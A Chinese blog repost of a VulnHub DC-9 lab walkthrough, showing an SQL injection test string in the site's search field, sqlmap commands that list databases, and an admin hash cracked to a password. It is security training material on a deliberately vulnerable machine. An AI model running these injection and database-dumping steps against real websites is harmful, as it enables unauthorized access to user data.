热门标签
热门文章
- 1rabbitmq的延迟队列和死信队列的实现(二种方式,超详细)_mq 延时消息 死信队列
- 2Go语言开发利器:几种主流IDE的优势与应用_go语言开发工具
- 3【LangChain】第3篇:Agent代理简介及实践_agent代理程序
- 4如何和hr谈薪资_hr问师兄的薪资
- 5嵌入式单片机之STM32F103C8T6最小系统板电路设计参考_stm32f103c8t6怎么用电池供电
- 6【Lora模型训练过程报错】Error no kernel image is available for execution on the device at line
- 7android测试类Test
- 8经典的Embedding方法Word2vec_word2vec.word2vec
- 9【人工智能】Transformers之Pipeline(二):自动语音识别(automatic-speech-recognition)_pipeline语音识别
- 10数字人整合包集合,第六个最好用,附免费下载链接_echomimic musetalk sadtalker 对比
当前位置: article > 正文
(VulnHub靶机通关)DC-9_vulhub下载地址
作者:Li_阴宅 | 2024-08-16 08:26:10
赞
踩
vulhub下载地址
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip
主机发现
IP:192.168.43.192 80端口为开放状态,22端口是filtered状态
web渗透
访问80端口的web服务,打开Search界面,输入1' or 1=1 #
存在sql注入
burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破
爆库名
python sqlmap.py -r "C:\Users\11989\Desktop\DC.txt" --dbs
有Staff、users库
爆出users库
查看当前库
python sqlmap.py -r "C:\Users\11989\Desktop\DC.txt" --current-db
爆Staff的数据,发现一个admin用户,将密码复制到https://www.somd5.com/解密
得到密码:transorbital1
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Li_阴宅/article/detail/987367
推荐阅读
相关标签
